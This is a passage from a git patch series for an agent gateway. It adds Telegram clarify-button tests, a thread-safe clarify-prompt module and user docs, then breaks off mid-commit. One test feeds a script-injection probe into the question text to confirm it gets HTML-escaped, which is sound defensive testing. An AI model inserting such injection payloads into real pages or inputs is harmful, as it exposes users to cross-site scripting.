+    mod = MagicMock()
+    mod.ext.ContextTypes.DEFAULT_TYPE = type(None)
+    mod.constants.ParseMode.MARKDOWN = "Markdown"
+    mod.constants.ParseMode.MARKDOWN_V2 = "MarkdownV2"
+    mod.constants.ParseMode.HTML = "HTML"
+    mod.constants.ChatType.PRIVATE = "private"
+    mod.constants.ChatType.GROUP = "group"
+    mod.constants.ChatType.SUPERGROUP = "supergroup"
+    mod.constants.ChatType.CHANNEL = "channel"
+    mod.error.NetworkError = type("NetworkError", (OSError,), {})
+    mod.error.TimedOut = type("TimedOut", (OSError,), {})
+    mod.error.BadRequest = type("BadRequest", (Exception,), {})
+
+    for name in ("telegram", "telegram.ext", "telegram.constants", "telegram.request"):
+        sys.modules.setdefault(name, mod)
+    sys.modules.setdefault("telegram.error", mod.error)
+
+
+_ensure_telegram_mock()
+
+from gateway.platforms.telegram import TelegramAdapter
+from gateway.config import Platform, PlatformConfig
+
+
+def _make_adapter(extra=None):
+    config = PlatformConfig(enabled=True, token="test-token", extra=extra or {})
+    adapter = TelegramAdapter(config)
+    adapter._bot = AsyncMock()
+    adapter._app = MagicMock()
+    return adapter
+
+
+def _clear_clarify_state():
+    from tools import clarify_gateway as cm
+    with cm._lock:
+        cm._entries.clear()
+        cm._session_index.clear()
+        cm._notify_cbs.clear()
+
+
+# ===========================================================================
+# send_clarify — render
+# ===========================================================================
+
+class TestTelegramSendClarify:
+    """Verify the rendered prompt has buttons or none, and stores state."""
+
+    def setup_method(self):
+        _clear_clarify_state()
+
+    @pytest.mark.asyncio
+    async def test_multi_choice_renders_buttons_and_other(self):
+        adapter = _make_adapter()
+        mock_msg = MagicMock()
+        mock_msg.message_id = 100
+        adapter._bot.send_message = AsyncMock(return_value=mock_msg)
+
+        result = await adapter.send_clarify(
+            chat_id="12345",
+            question="Which option?",
+            choices=["alpha", "beta", "gamma"],
+            clarify_id="cid1",
+            session_key="sk1",
+        )
+
+        assert result.success is True
+        assert result.message_id == "100"
+
+        kwargs = adapter._bot.send_message.call_args[1]
+        assert kwargs["chat_id"] == 12345
+        assert "Which option?" in kwargs["text"]
+        # InlineKeyboardMarkup with N+1 buttons (3 choices + Other)
+        markup = kwargs["reply_markup"]
+        assert markup is not None
+        # Mocked InlineKeyboardMarkup — just verify it was constructed
+        # with rows.  We check state instead of poking the mock structure.
+        assert "cid1" in adapter._clarify_state
+        assert adapter._clarify_state["cid1"] == "sk1"
+
+    @pytest.mark.asyncio
+    async def test_open_ended_no_keyboard(self):
+        adapter = _make_adapter()
+        mock_msg = MagicMock()
+        mock_msg.message_id = 101
+        adapter._bot.send_message = AsyncMock(return_value=mock_msg)
+
+        result = await adapter.send_clarify(
+            chat_id="12345",
+            question="What is your name?",
+            choices=None,
+            clarify_id="cid2",
+            session_key="sk2",
+        )
+
+        assert result.success is True
+        kwargs = adapter._bot.send_message.call_args[1]
+        # No reply_markup means no buttons — open-ended path
+        assert "reply_markup" not in kwargs
+        assert "What is your name?" in kwargs["text"]
+        assert adapter._clarify_state["cid2"] == "sk2"
+
+    @pytest.mark.asyncio
+    async def test_not_connected(self):
+        adapter = _make_adapter()
+        adapter._bot = None
+        result = await adapter.send_clarify(
+            chat_id="12345",
+            question="?",
+            choices=["a"],
+            clarify_id="cid3",
+            session_key="sk3",
+        )
+        assert result.success is False
+
+    @pytest.mark.asyncio
+    async def test_truncates_long_choice_label(self):
+        adapter = _make_adapter()
+        mock_msg = MagicMock()
+        mock_msg.message_id = 102
+        adapter._bot.send_message = AsyncMock(return_value=mock_msg)
+
+        long_choice = "x" * 200  # > 60 char cap
+        result = await adapter.send_clarify(
+            chat_id="12345",
+            question="?",
+            choices=[long_choice],
+            clarify_id="cid4",
+            session_key="sk4",
+        )
+        assert result.success is True
+        # The truncation logic replaces with "..." past 57 chars; we don't
+        # inspect the mock's button labels directly (auto-MagicMock), but
+        # we can verify the call didn't raise on absurdly long input.
+
+    @pytest.mark.asyncio
+    async def test_html_escapes_question(self):
+        adapter = _make_adapter()
+        mock_msg = MagicMock()
+        mock_msg.message_id = 103
+        adapter._bot.send_message = AsyncMock(return_value=mock_msg)
+
+        await adapter.send_clarify(
+            chat_id="12345",
+            question="<script>alert(1)</script>",
+            choices=["x"],
+            clarify_id="cid5",
+            session_key="sk5",
+        )
+        kwargs = adapter._bot.send_message.call_args[1]
+        # Must NOT contain raw <script> — html.escape should have neutralized
+        assert "<script>" not in kwargs["text"]
+        assert "&lt;script&gt;" in kwargs["text"]
+
+
+# ===========================================================================
+# Callback dispatch — _handle_callback_query routing for cl:* prefixes
+# ===========================================================================
+
+class TestTelegramClarifyCallback:
+    """Verify clicking a button resolves the clarify primitive."""
+
+    def setup_method(self):
+        _clear_clarify_state()
+
+    @pytest.mark.asyncio
+    async def test_numeric_choice_resolves_with_choice_text(self):
+        from tools import clarify_gateway as cm
+
+        adapter = _make_adapter()
+        # Pre-register a clarify entry so the callback can look up the choice text
+        cm.register("cidA", "sk-cb", "Pick", ["red", "green", "blue"])
+        adapter._clarify_state["cidA"] = "sk-cb"
+
+        query = AsyncMock()
+        query.data = "cl:cidA:1"  # green
+        query.message = MagicMock()
+        query.message.chat_id = 12345
+        query.message.text = "Pick"
+        query.from_user = MagicMock()
+        query.from_user.id = "777"
+        query.from_user.first_name = "Tester"
+        query.answer = AsyncMock()
+        query.edit_message_text = AsyncMock()
+
+        update = MagicMock()
+        update.callback_query = query
+        context = MagicMock()
+
+        with patch.dict(os.environ, {"TELEGRAM_ALLOWED_USERS": "*"}, clear=False):
+            await adapter._handle_callback_query(update, context)
+
+        # State popped
+        assert "cidA" not in adapter._clarify_state
+        # Wait shouldn't be needed — resolve_gateway_clarify is sync.
+        # The entry's response should be set.
+        # We test by reading the entry's response directly.
+        with cm._lock:
+            entry = cm._entries.get("cidA")
+        # Entry might be popped by wait_for_response, but here we never
+        # called wait — so it's still in _entries with response set.
+        assert entry is not None
+        assert entry.response == "green"
+        assert entry.event.is_set()
+        query.answer.assert_called_once()
+        query.edit_message_text.assert_called_once()
+
+    @pytest.mark.asyncio
+    async def test_other_button_flips_to_text_mode(self):
+        from tools import clarify_gateway as cm
+
+        adapter = _make_adapter()
+        cm.register("cidB", "sk-cb-other", "Pick", ["x", "y"])
+        adapter._clarify_state["cidB"] = "sk-cb-other"
+
+        query = AsyncMock()
+        query.data = "cl:cidB:other"
+        query.message = MagicMock()
+        query.message.chat_id = 12345
+        query.message.text = "Pick"
+        query.from_user = MagicMock()
+        query.from_user.id = "777"
+        query.from_user.first_name = "Tester"
+        query.answer = AsyncMock()
+        query.edit_message_text = AsyncMock()
+
+        update = MagicMock()
+        update.callback_query = query
+        context = MagicMock()
+
+        with patch.dict(os.environ, {"TELEGRAM_ALLOWED_USERS": "*"}, clear=False):
+            await adapter._handle_callback_query(update, context)
+
+        # Entry should now be in text-capture mode
+        pending = cm.get_pending_for_session("sk-cb-other")
+        assert pending is not None
+        assert pending.clarify_id == "cidB"
+        assert pending.awaiting_text is True
+        # State NOT popped — the user still needs to type their answer
+        assert "cidB" in adapter._clarify_state
+        # Entry NOT yet resolved
+        with cm._lock:
+            entry = cm._entries.get("cidB")
+        assert entry is not None
+        assert not entry.event.is_set()
+
+    @pytest.mark.asyncio
+    async def test_already_resolved(self):
+        adapter = _make_adapter()
+        # No state for cidGone
+
+        query = AsyncMock()
+        query.data = "cl:cidGone:0"
+        query.message = MagicMock()
+        query.message.chat_id = 12345
+        query.from_user = MagicMock()
+        query.from_user.id = "777"
+        query.from_user.first_name = "Tester"
+        query.answer = AsyncMock()
+
+        update = MagicMock()
+        update.callback_query = query
+        context = MagicMock()
+
+        with patch.dict(os.environ, {"TELEGRAM_ALLOWED_USERS": "*"}, clear=False):
+            await adapter._handle_callback_query(update, context)
+
+        query.answer.assert_called_once()
+        # Should NOT resolve anything
+        assert "already" in query.answer.call_args[1]["text"].lower()
+
+    @pytest.mark.asyncio
+    async def test_unauthorized_user_rejected(self):
+        from tools import clarify_gateway as cm
+
+        adapter = _make_adapter()
+        cm.register("cidC", "sk-auth", "Pick", ["a", "b"])
+        adapter._clarify_state["cidC"] = "sk-auth"
+
+        # Hook up a runner that says NOT authorized
+        class _DenyRunner:
+            async def _handle_message(self, event):
+                return None
+            def _is_user_authorized(self, source):
+                return False
+
+        adapter._message_handler = _DenyRunner()._handle_message
+
+        query = AsyncMock()
+        query.data = "cl:cidC:0"
+        query.message = MagicMock()
+        query.message.chat_id = 12345
+        query.message.chat.type = "private"
+        query.message.text = "Pick"
+        query.from_user = MagicMock()
+        query.from_user.id = "999"
+        query.from_user.first_name = "Mallory"
+        query.answer = AsyncMock()
+        query.edit_message_text = AsyncMock()
+
+        update = MagicMock()
+        update.callback_query = query
+        context = MagicMock()
+
+        await adapter._handle_callback_query(update, context)
+
+        # Must not resolve, must answer with not-authorized message
+        with cm._lock:
+            entry = cm._entries.get("cidC")
+        assert entry is not None
+        assert not entry.event.is_set()
+        query.answer.assert_called_once()
+        assert "not authorized" in query.answer.call_args[1]["text"].lower()
+        # State preserved
+        assert adapter._clarify_state["cidC"] == "sk-auth"
+
+    @pytest.mark.asyncio
+    async def test_invalid_choice_token(self):
+        from tools import clarify_gateway as cm
+
+        adapter = _make_adapter()
+        cm.register("cidD", "sk-inv", "Q?", ["a"])
+        adapter._clarify_state["cidD"] = "sk-inv"
+
+        query = AsyncMock()
+        query.data = "cl:cidD:not-a-number"
+        query.message = MagicMock()
+        query.message.chat_id = 12345
+        query.message.text = "Q?"
+        query.from_user = MagicMock()
+        query.from_user.id = "777"
+        query.from_user.first_name = "Tester"
+        query.answer = AsyncMock()
+
+        update = MagicMock()
+        update.callback_query = query
+        context = MagicMock()
+
+        with patch.dict(os.environ, {"TELEGRAM_ALLOWED_USERS": "*"}, clear=False):
+            await adapter._handle_callback_query(update, context)
+
+        with cm._lock:
+            entry = cm._entries.get("cidD")
+        assert entry is not None
+        assert not entry.event.is_set()
+        query.answer.assert_called_once()
+        assert "invalid" in query.answer.call_args[1]["text"].lower()
+
+
+# ===========================================================================
+# Base adapter fallback render — text numbered list
+# ===========================================================================
+
+class TestBaseAdapterClarifyFallback:
+    """Adapters without button overrides should render numbered text."""
+
+    @pytest.mark.asyncio
+    async def test_numbered_text_fallback(self):
+        from gateway.platforms.base import BasePlatformAdapter, SendResult
+
+        # Subclass just enough to instantiate
+        class _Stub(BasePlatformAdapter):
+            name = "stub"
+
+            def __init__(self):
+                # Skip base __init__ — we're not exercising it
+                self.sent: list = []
+
+            async def connect(self): pass
+            async def disconnect(self): pass
+            async def send(self, chat_id, content, **kw):
+                self.sent.append({"chat_id": chat_id, "content": content})
+                return SendResult(success=True, message_id="1")
+            async def edit(self, *a, **k): return SendResult(success=False)
+            async def get_history(self, *a, **k): return []
+            async def get_chat_info(self, *a, **k): return {}
+
+        adapter = _Stub()
+
+        result = await adapter.send_clarify(
+            chat_id="c",
+            question="Pick a fruit",
+            choices=["apple", "banana"],
+            clarify_id="x",
+            session_key="s",
+        )
+        assert result.success is True
+        assert len(adapter.sent) == 1
+        text = adapter.sent[0]["content"]
+        assert "Pick a fruit" in text
+        assert "1." in text and "apple" in text
+        assert "2." in text and "banana" in text
+
+    @pytest.mark.asyncio
+    async def test_open_ended_fallback_renders_question_only(self):
+        from gateway.platforms.base import BasePlatformAdapter, SendResult
+
+        class _Stub(BasePlatformAdapter):
+            name = "stub"
+            def __init__(self):
+                self.sent: list = []
+            async def connect(self): pass
+            async def disconnect(self): pass
+            async def send(self, chat_id, content, **kw):
+                self.sent.append(content)
+                return SendResult(success=True, message_id="1")
+            async def edit(self, *a, **k): return SendResult(success=False)
+            async def get_history(self, *a, **k): return []
+            async def get_chat_info(self, *a, **k): return {}
+
+        adapter = _Stub()
+        await adapter.send_clarify(
+            chat_id="c",
+            question="Free form?",
+            choices=None,
+            clarify_id="x",
+            session_key="s",
+        )
+        assert "Free form?" in adapter.sent[0]
+        # No numbered list — choices were empty
+        assert "1." not in adapter.sent[0]
diff --git a/tests/tools/test_clarify_gateway.py b/tests/tools/test_clarify_gateway.py
new file mode 100644
index 00000000000..61ea55c8cfc
--- /dev/null
+++ b/tests/tools/test_clarify_gateway.py
@@ -0,0 +1,207 @@
+"""Tests for the gateway-side clarify primitive (tools/clarify_gateway.py).
+
+The clarify tool needs to ask the user a question and block the agent
+thread until they respond.  These tests cover the module-level state
+machine: register, wait, resolve via button, resolve via text-fallback,
+"Other"-button text-capture flip, timeout, session boundary cleanup.
+"""
+
+from __future__ import annotations
+
+import threading
+import time
+from concurrent.futures import ThreadPoolExecutor
+
+import pytest
+
+
+def _clear_clarify_state():
+    """Reset module-level state between tests."""
+    from tools import clarify_gateway as cm
+    with cm._lock:
+        cm._entries.clear()
+        cm._session_index.clear()
+        cm._notify_cbs.clear()
+
+
+class TestClarifyPrimitive:
+    """Core register/wait/resolve mechanics."""
+
+    def setup_method(self):
+        _clear_clarify_state()
+
+    def test_button_choice_resolves_wait(self):
+        """resolve_gateway_clarify unblocks wait_for_response with the chosen string."""
+        from tools import clarify_gateway as cm
+
+        cm.register("id1", "sk1", "Pick one", ["A", "B", "C"])
+
+        def resolver():
+            time.sleep(0.05)
+            cm.resolve_gateway_clarify("id1", "B")
+
+        threading.Thread(target=resolver).start()
+        result = cm.wait_for_response("id1", timeout=2.0)
+        assert result == "B"
+
+    def test_open_ended_auto_awaits_text(self):
+        """Clarify with no choices is in text-capture mode immediately."""
+        from tools import clarify_gateway as cm
+
+        entry = cm.register("id2", "sk2", "Free form?", None)
+        assert entry.awaiting_text is True
+
+        # get_pending_for_session returns the entry so the gateway
+        # text-intercept can find it.
+        pending = cm.get_pending_for_session("sk2")
+        assert pending is not None
+        assert pending.clarify_id == "id2"
+
+    def test_button_choice_does_not_auto_await(self):
+        """Multi-choice clarify should NOT be in text-capture mode initially."""
+        from tools import clarify_gateway as cm
+
+        entry = cm.register("id3", "sk3", "Pick", ["X", "Y"])
+        assert entry.awaiting_text is False
+        assert cm.get_pending_for_session("sk3") is None
+
+    def test_other_button_flips_to_text_mode(self):
+        """mark_awaiting_text makes get_pending_for_session find the entry."""
+        from tools import clarify_gateway as cm
+
+        cm.register("id4", "sk4", "Pick", ["X", "Y"])
+        assert cm.get_pending_for_session("sk4") is None
+
+        flipped = cm.mark_awaiting_text("id4")
+        assert flipped is True
+
+        pending = cm.get_pending_for_session("sk4")
+        assert pending is not None
+        assert pending.clarify_id == "id4"
+
+    def test_mark_awaiting_text_unknown_id(self):
+        """mark_awaiting_text on a non-existent id returns False."""
+        from tools import clarify_gateway as cm
+
+        assert cm.mark_awaiting_text("nope") is False
+
+    def test_timeout_returns_none(self):
+        """wait_for_response returns None when no resolve fires within the timeout."""
+        from tools import clarify_gateway as cm
+
+        cm.register("id5", "sk5", "Q?", ["A"])
+        result = cm.wait_for_response("id5", timeout=0.2)
+        assert result is None
+
+    def test_resolve_unknown_id_returns_false(self):
+        """resolve_gateway_clarify is idempotent on unknown ids."""
+        from tools import clarify_gateway as cm
+
+        assert cm.resolve_gateway_clarify("nope", "anything") is False
+
+    def test_resolve_after_wait_completes_is_noop(self):
+        """A late resolve on a finished entry doesn't blow up."""
+        from tools import clarify_gateway as cm
+
+        cm.register("id6", "sk6", "Q?", ["A"])
+        # Time out, entry gets cleaned up
+        cm.wait_for_response("id6", timeout=0.1)
+        # Late button click — should not raise
+        result = cm.resolve_gateway_clarify("id6", "A")
+        assert result is False
+
+    def test_clear_session_cancels_pending_entries(self):
+        """clear_session unblocks blocked threads with empty response."""
+        from tools import clarify_gateway as cm
+
+        cm.register("id7", "sk7", "Q?", ["A"])
+
+        def waiter():
+            return cm.wait_for_response("id7", timeout=10.0)
+
+        with ThreadPoolExecutor(1) as pool:
+            fut = pool.submit(waiter)
+            time.sleep(0.05)
+            cancelled = cm.clear_session("sk7")
+            assert cancelled == 1
+            result = fut.result(timeout=2.0)
+            # clear_session sets response="" then the wait returns it
+            assert result == ""
+
+    def test_has_pending(self):
+        from tools import clarify_gateway as cm
+
+        cm.register("id8", "sk8", "Q?", ["A"])
+        assert cm.has_pending("sk8") is True
+        assert cm.has_pending("nonexistent") is False
+
+    def test_notify_register_unregister_clears_pending(self):
+        """unregister_notify cancels any pending clarify so threads unwind."""
+        from tools import clarify_gateway as cm
+
+        cm.register("id9", "sk9", "Q?", ["A"])
+
+        def waiter():
+            return cm.wait_for_response("id9", timeout=10.0)
+
+        with ThreadPoolExecutor(1) as pool:
+            fut = pool.submit(waiter)
+            time.sleep(0.05)
+
+            cm.register_notify("sk9", lambda entry: None)
+            cm.unregister_notify("sk9")
+
+            # unregister_notify calls clear_session; thread unwinds
+            result = fut.result(timeout=2.0)
+            assert result == ""
+
+    def test_session_index_isolation(self):
+        """Entries from different sessions don't leak across get_pending lookups."""
+        from tools import clarify_gateway as cm
+
+        cm.register("idA", "alpha", "Q?", None)  # auto-await text
+        cm.register("idB", "beta", "Q?", None)   # auto-await text
+
+        a = cm.get_pending_for_session("alpha")
+        b = cm.get_pending_for_session("beta")
+        assert a is not None and a.clarify_id == "idA"
+        assert b is not None and b.clarify_id == "idB"
+
+    def test_clarify_timeout_config_default(self):
+        """get_clarify_timeout returns 600 by default."""
+        from tools import clarify_gateway as cm
+
+        timeout = cm.get_clarify_timeout()
+        # Default 600s OR whatever is in the user's loaded config.
+        # Floor check: must be a positive int, not crashed.
+        assert isinstance(timeout, int)
+        assert timeout > 0
+
+
+class TestGatewayTextIntercept:
+    """The gateway's _handle_message intercepts text replies to pending clarifies."""
+
+    def setup_method(self):
+        _clear_clarify_state()
+
+    def test_get_pending_for_session_returns_oldest_text_awaiting(self):
+        """When two clarifies are pending, get_pending_for_session returns the
+        first that is awaiting_text (the older one if both)."""
+        from tools import clarify_gateway as cm
+
+        # Older multi-choice (not awaiting text)
+        cm.register("first", "sk", "Q1?", ["A"])
+        # Newer open-ended (awaiting text)
+        cm.register("second", "sk", "Q2?", None)
+
+        pending = cm.get_pending_for_session("sk")
+        # The newer one is awaiting text; the older isn't.
+        assert pending is not None
+        assert pending.clarify_id == "second"
+
+        # Now flip the first to text mode too.  Both are awaiting text,
+        # FIFO returns the older one.
+        cm.mark_awaiting_text("first")
+        pending2 = cm.get_pending_for_session("sk")
+        assert pending2 is not None
+        assert pending2.clarify_id == "first"
diff --git a/tools/clarify_gateway.py b/tools/clarify_gateway.py
new file mode 100644
index 00000000000..585d167625d
--- /dev/null
+++ b/tools/clarify_gateway.py
@@ -0,0 +1,278 @@
+"""Gateway-side clarify primitive (blocking event-based queue).
+
+The ``clarify`` tool needs to ask the user a question and block the agent
+thread until they respond.  In CLI mode this is trivial — ``input()`` is
+synchronous.  In gateway mode the agent runs on a worker thread while the
+event loop handles the user's reply, so we need a thread-safe primitive
+that:
+
+  * stores a pending clarify request (with a generated ``clarify_id``),
+  * blocks the agent thread on an ``Event``,
+  * resolves the wait when the gateway's button-callback or text-intercept
+    fires ``resolve_gateway_clarify(clarify_id, response)``,
+  * supports timeouts so a user who never responds does NOT hang the agent
+    thread forever (which would also pin the gateway's running-agent guard).
+
+State is module-level (same shape as ``tools.approval``) so platform
+adapters can call ``resolve_gateway_clarify`` without holding a back-
+reference to the ``GatewayRunner`` instance.
+
+Two delivery paths from the adapter:
+
+  1. **Button UI** — adapters override ``send_clarify`` to render inline
+     buttons (e.g. Telegram ``InlineKeyboardMarkup``).  The button
+     callback resolves with the chosen string.  A final "Other (type
+     answer)" button enters text-capture mode for free-form responses.
+
+  2. **Text fallback** — adapters without rich UI render a numbered list.
+     The user replies with a number ("2") or with free text; the gateway's
+     ``_handle_message`` intercepts the reply and resolves directly.
+"""
+
+from __future__ import annotations
+
+import logging
+import threading
+import time
+from dataclasses import dataclass, field
+from typing import Callable, Dict, List, Optional
+
+logger = logging.getLogger(__name__)
+
+
+# =========================================================================
+# Module-level state
+# =========================================================================
+
+@dataclass
+class _ClarifyEntry:
+    """One pending clarify request inside a gateway session."""
+    clarify_id: str
+    session_key: str
+    question: str
+    choices: Optional[List[str]]
+    event: threading.Event = field(default_factory=threading.Event)
+    response: Optional[str] = None
+    awaiting_text: bool = False  # set when user picked "Other" or clarify is open-ended
+
+    def signature(self) -> Dict[str, object]:
+        return {
+            "clarify_id": self.clarify_id,
+            "session_key": self.session_key,
+            "question": self.question,
+            "choices": list(self.choices) if self.choices else None,
+        }
+
+
+_lock = threading.RLock()
+# clarify_id → _ClarifyEntry  (primary lookup for button callbacks)
+_entries: Dict[str, _ClarifyEntry] = {}
+# session_key → list[clarify_id]  (FIFO; for text-fallback intercept and session cleanup)
+_session_index: Dict[str, List[str]] = {}
+
+
+# =========================================================================
+# Public API — agent-thread side
+# =========================================================================
+
+def register(
+    clarify_id: str,
+    session_key: str,
+    question: str,
+    choices: Optional[List[str]],
+) -> _ClarifyEntry:
+    """Register a pending clarify request and return the entry.
+
+    The caller (gateway clarify_callback) will then send the prompt to the
+    user and block on ``wait_for_response(clarify_id, timeout)``.
+    """
+    entry = _ClarifyEntry(
+        clarify_id=clarify_id,
+        session_key=session_key,
+        question=question,
+        choices=list(choices) if choices else None,
+        # Open-ended (no choices) → next message IS the response, no buttons needed.
+        awaiting_text=not bool(choices),
+    )
+    with _lock:
+        _entries[clarify_id] = entry
+        _session_index.setdefault(session_key, []).append(clarify_id)
+    return entry
+
+
+def wait_for_response(clarify_id: str, timeout: float) -> Optional[str]:
+    """Block on the entry's event until resolved or timeout fires.
+
+    Polls in 1-second slices so the agent's inactivity heartbeat keeps
+    firing — without this, ``Event.wait(timeout=600)`` blocks the thread
+    for 10 minutes with zero activity touches and the gateway's inactivity
+    watchdog kills the agent while the user is still typing.
+
+    Returns the resolved response string, or ``None`` on timeout.
+    """
+    with _lock:
+        entry = _entries.get(clarify_id)
+    if entry is None:
+        return None
+
+    try:
+        from tools.environments.base import touch_activity_if_due
+    except Exception:  # pragma: no cover - optional
+        touch_activity_if_due = None
+
+    deadline = time.monotonic() + max(timeout, 0.0)
+    activity_state = {"last_touch": time.monotonic(), "start": time.monotonic()}
+    while True:
+        remaining = deadline - time.monotonic()
+        if remaining <= 0:
+            break
+        if entry.event.wait(timeout=min(1.0, remaining)):
+            break
+        if touch_activity_if_due is not None:
+            touch_activity_if_due(activity_state, "waiting for user clarify response")
+
+    with _lock:
+        # Remove from indices regardless of resolution outcome.
+        _entries.pop(clarify_id, None)
+        ids = _session_index.get(entry.session_key)
+        if ids and clarify_id in ids:
+            ids.remove(clarify_id)
+            if not ids:
+                _session_index.pop(entry.session_key, None)
+
+    return entry.response
+
+
+# =========================================================================
+# Public API — gateway / adapter side
+# =========================================================================
+
+def resolve_gateway_clarify(clarify_id: str, response: str) -> bool:
+    """Unblock the agent thread waiting on ``clarify_id``.
+
+    Returns True if an entry was found and resolved, False otherwise
+    (already resolved, expired, or never existed).
+    """
+    with _lock:
+        entry = _entries.get(clarify_id)
+        if entry is None:
+            return False
+    entry.response = str(response) if response is not None else ""
+    entry.event.set()
+    return True
+
+
+def get_pending_for_session(session_key: str) -> Optional[_ClarifyEntry]:
+    """Return the OLDEST pending clarify entry for a session, or None.
+
+    Used by the text-fallback intercept in ``_handle_message`` — when a
+    clarify is awaiting a free-form text response, the next user message
+    in that session is captured as the answer.
+    """
+    with _lock:
+        ids = _session_index.get(session_key) or []
+        for cid in ids:
+            entry = _entries.get(cid)
+            if entry is None:
+                continue
+            if entry.awaiting_text:
+                return entry
+        return None
+
+
+def mark_awaiting_text(clarify_id: str) -> bool:
+    """Flip an entry into text-capture mode (user picked the 'Other' button).
+
+    Returns True if the entry exists and was flipped, False otherwise.
+    """
+    with _lock:
+        entry = _entries.get(clarify_id)
+        if entry is None:
+            return False
+        entry.awaiting_text = True
+        return True
+
+
+def has_pending(session_key: str) -> bool:
+    """Return True when this session has at least one pending clarify entry."""
+    with _lock:
+        ids = _session_index.get(session_key) or []
+        return any(_entries.get(cid) is not None for cid in ids)
+
+
+def clear_session(session_key: str) -> int:
+    """Resolve and drop every pending clarify for a session.
+
+    Used by session-boundary cleanup (e.g. ``/new``, gateway shutdown,
+    cached-agent eviction) so blocked agent threads don't hang past the
+    end of their session.  Returns the number of entries cancelled.
+    """
+    with _lock:
+        ids = list(_session_index.pop(session_key, []) or [])
+        entries = [_entries.pop(cid, None) for cid in ids]
+    cancelled = 0
+    for entry in entries:
+        if entry is None:
+            continue
+        # Empty string sentinel — agent code can distinguish from a real
+        # response by inspecting the wait_for_response return value
+        # alongside its own timeout deadline.  Most callers just treat any
+        # falsy result as "user did not respond".
+        entry.response = ""
+        entry.event.set()
+        cancelled += 1
+    return cancelled
+
+
+# =========================================================================
+# Config
+# =========================================================================
+
+def get_clarify_timeout() -> int:
+    """Read the clarify response timeout (seconds) from config.
+
+    Defaults to 600 (10 minutes) — long enough for the user to type a
+    thoughtful response, short enough that an abandoned prompt eventually
+    unblocks the agent thread instead of pinning the running-agent guard
+    forever.
+
+    Reads ``agent.clarify_timeout`` from config.yaml.
+    """
+    try:
+        from hermes_cli.config import load_config
+        cfg = load_config() or {}
+        agent_cfg = cfg.get("agent", {}) or {}
+        return int(agent_cfg.get("clarify_timeout", 600))
+    except Exception:
+        return 600
+
+
+# =========================================================================
+# Per-session notify hook (gateway → adapter bridge)
+# =========================================================================
+# Mirrors tools.approval's _gateway_notify_cbs: the gateway registers a
+# per-session callback that sends the clarify prompt to the user.  The
+# callback bridges sync→async (runs on the agent thread; schedules the
+# adapter ``send_clarify`` call on the event loop).
+
+_notify_cbs: Dict[str, Callable[[_ClarifyEntry], None]] = {}
+
+
+def register_notify(session_key: str, cb: Callable[[_ClarifyEntry], None]) -> None:
+    """Register a per-session notify callback used by ``clarify_callback``."""
+    with _lock:
+        _notify_cbs[session_key] = cb
+
+
+def unregister_notify(session_key: str) -> None:
+    """Drop the per-session notify callback and cancel any pending clarify entries."""
+    with _lock:
+        _notify_cbs.pop(session_key, None)
+    # Cancel any pending entries so blocked threads unwind when the run
+    # ends (interrupt, completion, gateway shutdown).
+    clear_session(session_key)
+
+
+def get_notify(session_key: str) -> Optional[Callable[[_ClarifyEntry], None]]:
+    with _lock:
+        return _notify_cbs.get(session_key)
diff --git a/website/docs/user-guide/messaging/telegram.md b/website/docs/user-guide/messaging/telegram.md
index ffbc9dfe074..95d9313c05e 100644
--- a/website/docs/user-guide/messaging/telegram.md
+++ b/website/docs/user-guide/messaging/telegram.md
@@ -907,6 +907,19 @@ When the agent tries to run a potentially dangerous command, it asks you for app
 
 Reply "yes"/"y" to approve or "no"/"n" to deny.
 
+## Interactive Prompts (clarify)
+
+When the agent calls the `clarify` tool — to ask which approach you prefer, get post-task feedback, or check before a non-trivial decision — Telegram renders the question with **inline keyboard buttons**:
+
+> ❓ Which framework should I use for the dashboard?
+>
+> [1. Next.js] [2. Remix] [3. Astro]
+> [✏️ Other (type answer)]
+
+Tap a button to answer, or tap **Other** to type a free-form response (the next message you send becomes the answer). Open-ended `clarify` calls (no preset choices) skip the buttons and just capture your next message.
+
+Configure the response timeout via `agent.clarify_timeout` in `~/.hermes/config.yaml` (default `600` seconds). If you don't respond within the timeout, the agent unblocks with a sentinel message and adapts rather than hanging.
+
 ## Security
 
 :::warning

From 9b2488af2af975329fa08a3c5d9893651215b4e2 Mon Sep 17 00:00:00 2001
From: ryptotalent <112634774+ryptotalent@users.noreply.github.com>
Date: Tue, 12 May 2026 16:33:49 -0700
Subject: [PATCH 35/59] fix: include arg-taking commands in Telegram menu

Built-in commands with required args (e.g. /queue, /steer, /background)
were excluded from Telegram setMyCommands output, making them invisible
in the autocomplete menu. However, their handlers already return usage
text when invoked without arguments, so hiding them hurts discoverability.

This commit removes the _requires_argument filter for built-in commands
(COMMAND_REGISTRY) while keeping it for plugin-registered slash commands,
which may not provide a no-arg usage fallback.

Closes #24312
---
 hermes_cli/commands.py            | 17 ++++++++++-------
 tests/hermes_cli/test_commands.py | 12 +++++++-----
 2 files changed, 17 insertions(+), 12 deletions(-)

diff --git a/hermes_cli/commands.py b/hermes_cli/commands.py
index 1478b8b2e44..f071b2acac4 100644
--- a/hermes_cli/commands.py
+++ b/hermes_cli/commands.py
@@ -468,20 +468,23 @@ def telegram_bot_commands() -> list[tuple[str, str]]:
 
     Telegram command names cannot contain hyphens, so they are replaced with
     underscores.  Aliases are skipped -- Telegram shows one menu entry per
-    canonical command. Commands that require arguments are skipped because
-    selecting a Telegram BotCommand sends only ``/command`` and would execute
-    an incomplete command.
+    canonical command.
 
-    Plugin-registered slash commands are included so plugins get native
-    autocomplete in Telegram without touching core code.
+    Built-in commands that require arguments (e.g. /queue, /steer, /background)
+    are **included** because their handlers return usage text when selected
+    without a payload, making them discoverable via autocomplete.
+
+    Plugin-registered slash commands that require arguments are **excluded**
+    because plugins may not provide a no-arg usage fallback.
     """
     overrides = _resolve_config_gates()
     result: list[tuple[str, str]] = []
     for cmd in COMMAND_REGISTRY:
         if not _is_gateway_available(cmd, overrides):
             continue
-        if _requires_argument(cmd.args_hint):
-            continue
+        # Built-in arg-taking commands are included — their handlers show
+        # usage text when invoked without arguments, and hiding them from
+        # the menu hurts discoverability (issue #24312).
         tg_name = _sanitize_telegram_name(cmd.name)
         if tg_name:
             result.append((tg_name, cmd.description))
diff --git a/tests/hermes_cli/test_commands.py b/tests/hermes_cli/test_commands.py
index ad4c7d5c638..d08f886fa6a 100644
--- a/tests/hermes_cli/test_commands.py
+++ b/tests/hermes_cli/test_commands.py
@@ -242,12 +242,14 @@ class TestTelegramBotCommands:
                 tg_name = cmd.name.replace("-", "_")
                 assert tg_name not in names
 
-    def test_excludes_commands_with_required_args(self):
+    def test_includes_builtin_commands_with_required_args(self):
+        """Built-in arg-taking commands (e.g. /queue, /steer, /background)
+        are now included because their handlers return usage text when
